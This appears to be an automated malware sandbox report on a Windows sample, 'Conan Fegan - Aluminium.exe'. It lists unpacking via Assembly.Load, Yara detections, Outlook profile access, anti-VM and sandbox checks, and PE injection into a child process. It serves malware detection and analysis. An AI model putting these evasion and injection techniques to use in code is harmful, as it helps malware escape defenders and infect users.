                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Conan Fegan - Aluminium.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                  Source: Conan Fegan - Aluminium.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                  Source: unknownProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe 'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe'
                  Source: unknownProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exeJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: Conan Fegan - Aluminium.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Conan Fegan - Aluminium.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                  Data Obfuscation:

                  barindex
                  .NET source code contains potential unpackerShow sources
                  Source: Conan Fegan - Aluminium.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Yara detected aPLib compressed binaryShow sources
                  Source: Yara matchFile source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 7008, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPE
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A365E8 push esp; retf 0_2_07A365E9
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A3E9FD push FFFFFF8Bh; iretd 0_2_07A3E9FF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00402AC0 push eax; ret 5_2_00402AD4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00402AC0 push eax; ret 5_2_00402AFC
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.26782540442
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM_3Show sources
                  Source: Yara matchFile source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Conan Fegan - Aluminium.exe PID: 4748, type: MEMORY
                  Source: Yara matchFile source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPE
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 3716Thread sleep time: -103082s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 684Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe TID: 4600Thread sleep time: -960000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]5_2_0040317B
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,5_2_00402B7C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeMemory written: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeProcess created: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe C:\Users\user\Desktop\Conan Fegan - Aluminium.exeJump to behavior
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.901234801.0000000001810000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
